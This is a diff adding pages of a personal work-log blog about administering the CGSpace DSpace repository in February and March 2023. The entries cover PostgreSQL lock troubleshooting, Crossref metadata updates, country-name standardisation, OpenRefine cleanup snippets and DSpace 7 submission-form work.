+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi|dspaceCli)&#39;</span> | sort | uniq -c
+</span></span><span style="display:flex;"><span>     44 dspaceApi
+</span></span><span style="display:flex;"><span>    372 dspaceCli
+</span></span><span style="display:flex;"><span>    446 dspaceWeb
+</span></span></code></pre></div><ul>
+<li>This started happening yesterday and I killed a few locks that were several hours old after inspecting the <code>locks-age.sql</code> output</li>
+<li>I also checked the <code>locks.sql</code> output, which helpfully lists the blocked PID and the blocking PID, to find one blocking PID that was idle in transaction
+<ul>
+<li>I killed that process and then all other locks were instantly processed</li>
+</ul>
+</li>
+<li>I filed <a href="https://github.com/DSpace/dspace-angular/issues/2103">a GitHub issue</a> on dspace-angular requesting the item view to use the bitstream description instead of the file name if present</li>
+<li>Weekly CG Core types meeting
+<ul>
+<li>I need to go through the actions and remove those items that are only for CGSpace internal use, ie:
+<ul>
+<li>CD-ROM</li>
+<li>Manuscript-unpublished</li>
+<li>Photo Report</li>
+<li>Questionnaire</li>
+<li>Wiki</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Weekly CGIAR Repository Working Group meeting</li>
+<li>I did some experiments with Crossref dates for about 20,000 DOIs in CGSpace using my <code>crossref-doi-lookup.py</code> script</li>
+<li>Some things I noted from reading the <a href="https://github.com/CrossRef/rest-api-doc/blob/master/api_format.md">Crossref API docs</a> and inspecting the records for a few dozen DOIs manually:
+<ul>
+<li><code>[&quot;created&quot;][&quot;date-parts&quot;]</code> → Date on which the DOI was first registered (not useful for us)</li>
+<li><code>[&quot;published-print&quot;][&quot;date-parts&quot;]</code> → Date on which the work was published in print</li>
+<li><code>[&quot;journal-issue&quot;][&quot;published-print&quot;][&quot;date-parts&quot;]</code> → When present, is 99% the same as the above</li>
+<li><code>[&quot;published-online&quot;][&quot;date-parts&quot;]</code> → Date on which the work was published online</li>
+<li><code>[&quot;journal-issue&quot;][&quot;published-online&quot;][&quot;date-parts&quot;]</code> → Much more rare, and only 50% the same as the above, so unreliable</li>
+<li><code>[&quot;issued&quot;][&quot;date-parts&quot;]</code> → Earliest of published-print and published-online (not useful to us)</li>
+</ul>
+</li>
+<li>After checking the DOIs manully I decided that when the <code>published-print</code> date exists, it is usually more accurate than our issued dates
+<ul>
+<li>I set 12,300 issue dates to those from Crossref</li>
+</ul>
+</li>
+<li>I also decided that, when <code>published-online</code> exists, it is usually accurate when I check the publisher page (we don&rsquo;t have many online dates to compare)
+<ul>
+<li>I set the available date for ~7,000 items to the published-online date as long as:
+<ul>
+<li>There was no <code>dcterms.available</code> date already</li>
+<li>It was different than the issued date, because for now I only want online dates that are different, in case this is an online only journal in which case that can be the issue date&hellip; maybe I&rsquo;ll re-visit that later</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-17">2023-02-17</h2>
+<ul>
+<li>It seems some (all?) of the changes I applied to dates last night didn&rsquo;t get saved&hellip;
+<ul>
+<li>I don&rsquo;t know what happened, so I will run them again after some investigation</li>
+<li>I submitted the first batch of ~7,600 changes and it took twelve hours!</li>
+<li>I almost cancelled it because after applying the changes there was a lock blocking everything for two hours, and it seemed to be stuck, but I kept checking it and saw that the <code>query_start</code> and <code>state_change</code> were being updated despite it being state &ldquo;idle in transaction&rdquo;:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity WHERE pid=1025176&#39;</span> | less -S
+</span></span></code></pre></div><ul>
+<li>I will apply the other changes in smaller batches&hellip;</li>
+<li>Lately I&rsquo;ve noticed a lot of activity from the country code tagger curation task
+<ul>
+<li>Looking in the logs I see items being tagged that are very old and should have already been tagged years ago</li>
+<li>Also, I see a ton of these errors whenever the task is updating an item:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>2023-02-17 08:01:00,252 INFO  org.dspace.curate.Curator @ Curation task: countrycodetagger performed on: 10568/89020 with status: 0. Result: &#39;10568/89020: added 1 alpha2 country code(s)&#39;
+</span></span><span style="display:flex;"><span>2023-02-17 08:01:00,467 ERROR com.atmire.versioning.ModificationLogger @ Error while writing item to versioning index: a0fe9d9a-6ac1-4b6a-8fcb-dae07a6bbf58 message:missing required field: epersonID
+</span></span><span style="display:flex;"><span>org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: missing required field: epersonID
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:116)
+</span></span><span style="display:flex;"><span>        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:102)
+</span></span><span style="display:flex;"><span>        at com.atmire.versioning.ModificationLogger.indexItem(ModificationLogger.java:263)
+</span></span><span style="display:flex;"><span>        at com.atmire.versioning.ModificationConsumer.end(ModificationConsumer.java:134)
+</span></span><span style="display:flex;"><span>        at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:157)
+</span></span><span style="display:flex;"><span>        at org.dspace.core.Context.dispatchEvents(Context.java:455)
+</span></span><span style="display:flex;"><span>        at org.dspace.curate.Curator.visit(Curator.java:541)
+</span></span><span style="display:flex;"><span>        at org.dspace.curate.Curator$TaskRunner.run(Curator.java:568)
+</span></span><span style="display:flex;"><span>        at org.dspace.curate.Curator.doCollection(Curator.java:515)
+</span></span><span style="display:flex;"><span>        at org.dspace.curate.Curator.doCommunity(Curator.java:487)
+</span></span><span style="display:flex;"><span>        at org.dspace.curate.Curator.doSite(Curator.java:451)
+</span></span><span style="display:flex;"><span>        at org.dspace.curate.Curator.curate(Curator.java:269)
+</span></span><span style="display:flex;"><span>        at org.dspace.curate.Curator.curate(Curator.java:203)
+</span></span><span style="display:flex;"><span>        at org.dspace.curate.CurationCli.main(CurationCli.java:220)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+</span></span><span style="display:flex;"><span>        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+</span></span><span style="display:flex;"><span>        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+</span></span><span style="display:flex;"><span>        at java.lang.reflect.Method.invoke(Method.java:498)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+</span></span><span style="display:flex;"><span>        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</span></span></code></pre></div><ul>
+<li>This must be related&hellip;</li>
+</ul>
+<h2 id="2023-02-18">2023-02-18</h2>
+<ul>
+<li>I realized why the country-code-tagger was tagging everything: I had overridden the <code>force</code> parameter last week!</li>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-02-20">2023-02-20</h2>
+<ul>
+<li>IWMI is concerned that some of their items with top Altmetric attention scores don&rsquo;t show up in the AReS Explorer
+<ul>
+<li>I looked into it for one and found that AReS is using the Handle, but Altmetric hasn&rsquo;t associated the Handle with the DOI</li>
+</ul>
+</li>
+<li>Looking into country and region issues for the PRMS team
+<ul>
+<li>Last week they had some questions about some invalid countries that ended up being typos</li>
+<li>I realized my cgspace-java-helpers country-code-tagger curation task is not using the latest version, so it was missing Türkiye</li>
+<li>I compiled the new version and ran it manually, but I have to upload a new version to Maven Central and then update the dependency in <code>dspace/modules/additions/pom.xml</code> ughhhhhh</li>
+<li>I tagged version 6.2 with the change for Türkiye and uploaded to to Maven Central with <code>mvn clean deploy</code></li>
+</ul>
+</li>
+<li>I&rsquo;m having second thoughts about switching to UN M.49 for countries because there are just too many tradeoffs
+<ul>
+<li>I want to find a way to keep our existing list, and codify some rules for it</li>
+<li>There are several discussions related to the shortcomings of ISO themselves and the iso-codes project, for example:
+<ul>
+<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/33">Inconsistency with articles in ISO-3166-1 English short names</a> (this one was filed by me two years ago!)</li>
+<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/issues/44">ISO 3166-1: What&rsquo;s the policy for <code>common_name</code>?</a></li>
+</ul>
+</li>
+<li>I almost want to say fuck it, let&rsquo;s just use iso-codes and tell everyone to deal with it, but make sure we handle ISO 3166-1 Alpha2 or probably Alpha3 in the future</li>
+<li>Something like:
+<ul>
+<li>Prefer <code>common_name</code> if it exists</li>
+<li>Prefer the shorter of <code>name</code> and <code>official name</code></li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-21">2023-02-21</h2>
+<ul>
+<li>Continue working on my <code>parse-iso-codes.py</code> script to parse the iso-codes JSON for ISO 3166-1
+<ul>
+<li>I also started a spreadsheet to track current CGSpace country names, proposed new names using the compromise above, and UN M.49 names</li>
+<li>I proposed this to Peter but he wasn&rsquo;t happy because there are still some stupidly long and political names there</li>
+</ul>
+</li>
+<li>I bumped the version of cgspace-java-helpers to 6.2-SNAPSHOT and pushed it to Maven Central because I can&rsquo;t figure out how to get non-snapshot releases to go there</li>
+<li>Ouch, grunt 1.6.0 was released a few weeks ago, which relies on Node.js v16, thus breaking the Mirage 2 build in DSpace 6
+<ul>
+<li>I filed <a href="https://github.com/DSpace/DSpace/issues/8676">an issue in DSpace</a></li>
+</ul>
+</li>
+<li>Help Moises from CIP troubleshoot harvesting issues on their WordPress site
+<ul>
+<li>I see 2,000 requests with the user agent &ldquo;RTB website BOT&rdquo; today and they are all HTTP 200</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep <span style="color:#e6db74">&#39;RTB website BOT&#39;</span> /var/log/nginx/rest.log | awk <span style="color:#e6db74">&#39;{print $9}&#39;</span> | sort | uniq -c | sort -h
+</span></span><span style="display:flex;"><span>   2023 200
+</span></span></code></pre></div><ul>
+<li>Start reviewing and fixing metadata for Sam&rsquo;s ~250 CAS publications from last year
+<ul>
+<li>Both Abenet and Peter have already looked at them and Sam has been waiting for months on this</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-22">2023-02-22</h2>
+<ul>
+<li>Continue proofing CAS records for Sam
+<ul>
+<li>I downloaded all the PDFs manually and checked the issue dates for each from the PDF, noting some that had licenses, ISBNs, etc</li>
+<li>I combined the title, abstract, and system subjects into one column to mine them for AGROVOC terms:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>toLowercase(value) + toLowercase(cells[&#34;dcterms.abstract&#34;].value) + toLowercase(cells[&#34;cg.subject.system&#34;].value.replace(&#34;||&#34;, &#34; &#34;))
+</span></span></code></pre></div><ul>
+<li>Then I extracted a list of AGROVOC terms the same way I did in <a href="/cgspace-notes/2022-08/">August, 2022</a> and used this Jython code to extract matching terms:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> re
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">with</span> open(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;/tmp/agrovoc-subjects.txt&#34;</span>,<span style="color:#e6db74">&#39;r&#39;</span>) <span style="color:#66d9ef">as</span> f : 
+</span></span><span style="display:flex;"><span>    terms <span style="color:#f92672">=</span> [name<span style="color:#f92672">.</span>rstrip()<span style="color:#f92672">.</span>lower() <span style="color:#66d9ef">for</span> name <span style="color:#f92672">in</span> f]
+</span></span><span style="display:flex;"><span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#34;||&#34;</span><span style="color:#f92672">.</span>join([term <span style="color:#66d9ef">for</span> term <span style="color:#f92672">in</span> terms <span style="color:#66d9ef">if</span> re<span style="color:#f92672">.</span><span style="color:#66d9ef">match</span>(<span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;.*\b&#34;</span> <span style="color:#f92672">+</span> term <span style="color:#f92672">+</span> <span style="color:#e6db74">r</span><span style="color:#e6db74">&#34;\b.*&#34;</span>, value<span style="color:#f92672">.</span>lower())])
+</span></span></code></pre></div><ul>
+<li>Then I used <a href="https://stackoverflow.com/questions/15419080/openrefine-remove-duplicates-from-list-with-jython">this cool Jython to remove duplicate metadata values</a>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>deduped_list <span style="color:#f92672">=</span> list(set(value<span style="color:#f92672">.</span>split(<span style="color:#e6db74">&#34;||&#34;</span>)))
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#39;||&#39;</span><span style="color:#f92672">.</span>join(map(str, deduped_list))
+</span></span></code></pre></div><ul>
+<li>Then I did the same with countries, woooooo!</li>
+<li>I checked for duplicates and found forty-one</li>
+<li>I just stumbled upon UNTERM, which provides the official list of countries for the UN General Assembly, including a downloadable Excel with the short and formal names in all UN languages: <a href="https://unterm.un.org/unterm2/en/country">https://unterm.un.org/unterm2/en/country</a></li>
+<li>I created a <a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/merge_requests/32">pull request to add common names for Iran, Laos, and Syria on the Debian iso-codes package</a>
+<ul>
+<li>These are remarked upon in the ISO.org online browsing platform for ISO 3166-1</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-23">2023-02-23</h2>
+<ul>
+<li>Tag v0.6.1 of csv-metadata-quality</li>
+<li>Weekly meeting about CG Core types
+<ul>
+<li>I need to get some definitions from Peter for some types</li>
+</ul>
+</li>
+<li>Peter sent some of the feedback from Indira to XMLUI
+<ul>
+<li>I removed some old facets, limited others to less values, and adjusted the recent submissions from 5 to 10</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-24">2023-02-24</h2>
+<ul>
+<li>More work on understanding Sam&rsquo;s CAS publications to prepare for uploading them to CGSpace
+<ul>
+<li>I need to reconcile the duplicates and Peter&rsquo;s type re-classifications in the final version of the spreadsheet</li>
+<li>I flagged all the duplicates by creating a custom text facet matching all their titles like:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
+</span></span><span style="display:flex;"><span>  isNotNull(value.match(&#34;Evaluation of the CGIAR Research Program on Climate Change, Agriculture and Food Security (CCAFS)&#34;)),
+</span></span><span style="display:flex;"><span>  isNotNull(value.match(&#34;Report of the IEA Workshop on Development, Use and Assessment of TOC in CGIAR Research, Rome, 12-13 January 2017&#34;)),
+</span></span><span style="display:flex;"><span>  isNotNull(value.match(&#34;Report of the IEA Workshop on Evaluating the Quality of Science, Rome, 10-11 December 2015&#34;)),
+</span></span><span style="display:flex;"><span>  isNotNull(value.match(&#34;Review of CGIAR’s Intellectual Assets Principles&#34;)),
+</span></span><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>)
+</span></span></code></pre></div><ul>
+<li>Annoyingly this seems to miss the ones with parenthesis so I had to do those manually
+<ul>
+<li>This matched thirty-seven items, then I flagged them so I can handle them separately after uploading the others</li>
+<li>Then I used the URL field in the old version of the file to match the items with types <code>Evaluation</code> and <code>Independent Commentary</code> since Peter changed them</li>
+<li>I added extent, volume, issue, number, and affiliation to a few journal articles</li>
+<li>Then I did some last minute checks to make sure we&rsquo;re not uploading files for items marked as having &ldquo;multiple documents&rdquo;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-25">2023-02-25</h2>
+<ul>
+<li>Oh nice, my <a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/merge_requests/32">pull request adding common names for Iran, Laos, and Syria to iso-codes</a> was merged</li>
+<li>I did a test import of the 198 CAS Publications on DSpace Test, then inspected Abenet&rsquo;s file with Gaia&rsquo;s &ldquo;multiple documents&rdquo; field one more time and decided to do the import on CGSpace
+<ul>
+<li>Gaia&rsquo;s &ldquo;multiple documents&rdquo; column had some text like &ldquo;E6&rdquo; and &ldquo;F7&rdquo; that didn&rsquo;t make any sense, and those files were not in the Sharepoint even</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-26">2023-02-26</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-02-27">2023-02-27</h2>
+<ul>
+<li>I found two items for the CAS Publications that were marked as a duplicates, but upon second inspection were not, so I uploaded it to CGSpace
+<ul>
+<li>That makes the total number of items for CAS 200&hellip;</li>
+</ul>
+</li>
+<li>I did some CSV joining and inspections with the remaining thirty-six duplicates with the metadata for their existing items on CGSpace and uploaded them</li>
+<li>Do some work on the new DSpace 7 submission forms
+<ul>
+<li>I ended up reverting to the stock configuration to use some new techniques like the style and type bind</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-02-28">2023-02-28</h2>
+<ul>
+<li>Keep working on the DSpace 7 submission forms
+<ul>
+<li>As part of this I asked Maria and Francesca if they are still using the <code>cg.link.permalink</code> (Bioversity publications permalink) and they said no, so we can remove it from the submission form</li>
+<li>I also removed <code>cg.subject.ccafs</code> since the CRP ended over a year ago and <code>cg.subject.pabra</code> since there have only been a handful of new items in <a href="https://hdl.handle.net/10568/80211">their collection</a> and they seem to be using Alliance subjects instead</li>
+</ul>
+</li>
+<li>I filed <a href="https://github.com/DSpace/DSpace/issues/8686">a bug</a> on DSpace regarding the inability to add freetext values from an input field that uses a vocabulary</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2023-03/index.html b/docs/2023-03/index.html
new file mode 100644
index 000000000..ec7139e5a
--- /dev/null
+++ b/docs/2023-03/index.html
@@ -0,0 +1,913 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="March, 2023" />
+<meta property="og:description" content="2023-03-01
+
+Remove cg.subject.wle and cg.identifier.wletheme from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)
+iso-codes 4.13.0 was released, which incorporates my changes to the common names for Iran, Laos, and Syria
+I finally got through with porting the input form from DSpace 6 to DSpace 7
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2023-03/" />
+<meta property="article:published_time" content="2023-03-01T07:58:36+03:00" />
+<meta property="article:modified_time" content="2023-04-02T09:16:25+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="March, 2023"/>
+<meta name="twitter:description" content="2023-03-01
+
+Remove cg.subject.wle and cg.identifier.wletheme from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)
+iso-codes 4.13.0 was released, which incorporates my changes to the common names for Iran, Laos, and Syria
+I finally got through with porting the input form from DSpace 6 to DSpace 7
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "March, 2023",
+  "url": "https://alanorth.github.io/cgspace-notes/2023-03/",
+  "wordCount": "4810",
+  "datePublished": "2023-03-01T07:58:36+03:00",
+  "dateModified": "2023-04-02T09:16:25+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2023-03/">
+
+    <title>March, 2023 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2023-03/">March, 2023</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2023-03-01T07:58:36+03:00">Wed Mar 01, 2023</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2023-03-01">2023-03-01</h2>
+<ul>
+<li>Remove <code>cg.subject.wle</code> and <code>cg.identifier.wletheme</code> from CGSpace input form after confirming with IWMI colleagues that they no longer need them (WLE closed in 2021)</li>
+<li><a href="https://salsa.debian.org/iso-codes-team/iso-codes/-/blob/main/CHANGELOG.md#4130-2023-02-28">iso-codes 4.13.0 was released</a>, which incorporates my changes to the common names for Iran, Laos, and Syria</li>
+<li>I finally got through with porting the input form from DSpace 6 to DSpace 7</li>
+</ul>
+<ul>
+<li>I can&rsquo;t put my finger on it, but the input form has to be formatted very particularly, for example if your rows have more than two fields in them with out a sufficient Bootstrap grid style, or if you use a <code>twobox</code>, etc, the entire form step appears blank</li>
+</ul>
+<h2 id="2023-03-02">2023-03-02</h2>
+<ul>
+<li>I did some experiments with the new <a href="https://datapythonista.me/blog/pandas-20-and-the-arrow-revolution-part-i">Pandas 2.0.0rc0 Apache Arrow support</a>
+<ul>
+<li>There is a change to the way nulls are handled and it causes my tests for <code>pd.isna(field)</code> to fail</li>
+<li>I think we need consider blanks as null, but I&rsquo;m not sure</li>
+</ul>
+</li>
+<li>I made some adjustments to the Discovery sidebar facets on DSpace 6 while I was looking at the DSpace 7 configuration
+<ul>
+<li>I downgraded CIFOR subject, Humidtropics subject, Drylands subject, ICARDA subject, and Language from DiscoverySearchFilterFacet to DiscoverySearchFilter in <code>discovery.xml</code> since we are no longer using them in sidebar facets</li>
+</ul>
+</li>
+</ul>
+<h2 id="2023-03-03">2023-03-03</h2>
+<ul>
+<li>Atmire merged one of my old pull requests into COUNTER-Robots:
+<ul>
+<li><a href="https://github.com/atmire/COUNTER-Robots/pull/54">COUNTER_Robots_list.json: Add new bots</a></li>
+</ul>
+</li>
+<li>I will update the local ILRI overrides in our DSpace spider agents file</li>
+</ul>
+<h2 id="2023-03-04">2023-03-04</h2>
+<ul>
+<li>Submit a <a href="https://github.com/flyingcircusio/pycountry/pull/156">pull request on pycountry to use iso-codes 4.13.0</a></li>
+</ul>
+<h2 id="2023-03-05">2023-03-05</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2023-03-06">2023-03-06</h2>
+<ul>
+<li>Export CGSpace to do Initiative collection mappings
+<ul>
+<li>There were thirty-three that needed updating</li>
+</ul>
+</li>
+<li>Send Abenet and Sam a list of twenty-one CAS publications that had been marked as &ldquo;multiple documents&rdquo; that we uploaded as metadata-only items
+<ul>
+<li>Goshu will download the PDFs for each and upload them to the items on CGSpace manually</li>
+</ul>
+</li>
+<li>I spent some time trying to get csv-metadata-quality working with the new Arrow backend for Pandas 2.0.0rc0
+<ul>
+<li>It seems there is a problem recognizing empty strings as na with <code>pd.isna()</code></li>
+<li>If I do <code>pd.isna(field) or field == &quot;&quot;</code> then it works as expected, but that feels hacky</li>
+<li>I&rsquo;m going to test again on the next release&hellip;</li>
+<li>Note that I had been setting both of these global options:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>pd.options.mode.dtype_backend = &#39;pyarrow&#39;
+pd.options.mode.nullable_dtypes = True
+</code></pre><ul>
+<li>Then reading the CSV like this:</li>
+</ul>
+<pre tabindex="0"><code>df = pd.read_csv(args.input_file, engine=&#39;pyarrow&#39;, dtype=&#39;string[pyarrow]&#39;
+</code></pre><h2 id="2023-03-07">2023-03-07</h2>
+<ul>
+<li>Create a PostgreSQL 14 instance on my local environment to start testing compatibility with DSpace 6 as well as all my scripts:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman pull docker.io/library/postgres:14-alpine
+</span></span><span style="display:flex;"><span>$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5432:5432 -d postgres:14-alpine
+</span></span><span style="display:flex;"><span>$ createuser -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres --pwprompt dspacetest
+</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5432</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspacetest
+</span></span></code></pre></div><ul>
+<li>Peter sent me a list of items that had ILRI affiation on Altmetric, but that didn&rsquo;t have Handles
+<ul>
+<li>I ran a duplicate check on them to find if they exist or if we can import them</li>
+<li>There were about ninety matches, but a few dozen of those were pre-prints!</li>
+<li>After excluding those there were about sixty-one items we already have on CGSpace so I will add their DOIs to the existing items
+<ul>
+<li>After joining these with the records from CGSpace and inspecting the DOIs I found that only forty-four were new DOIs</li>
+<li>Surprisingly some of the DOIs on Altmetric were not working, though we also had some that were not working (specifically the Journal of Agricultural Economics seems to have reassigned DOIs)</li>
+</ul>
+</li>
+<li>For the rest of the ~359 items I extracted their DOIs and looked up the metadata on Crossref using my <code>crossref-doi-lookup.py</code> script
+<ul>
+<li>After spending some time cleaning the data in OpenRefine I realized we don&rsquo;t get access status from Crossref</li>
+<li>We can imply it if the item is Creative Commons, but otherwise I might be able to use <a href="https://unpaywall.org/products/api">Unpaywall&rsquo;s API</a></li>
+<li>I found some false positives in Unpaywall, so I might only use their data when it says the DOI is not OA&hellip;</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>During this process I updated my <code>crossref-doi-lookup.py</code> script to get more information from Crossref like ISSNs, ISBNs, full journal title, and subjects</li>
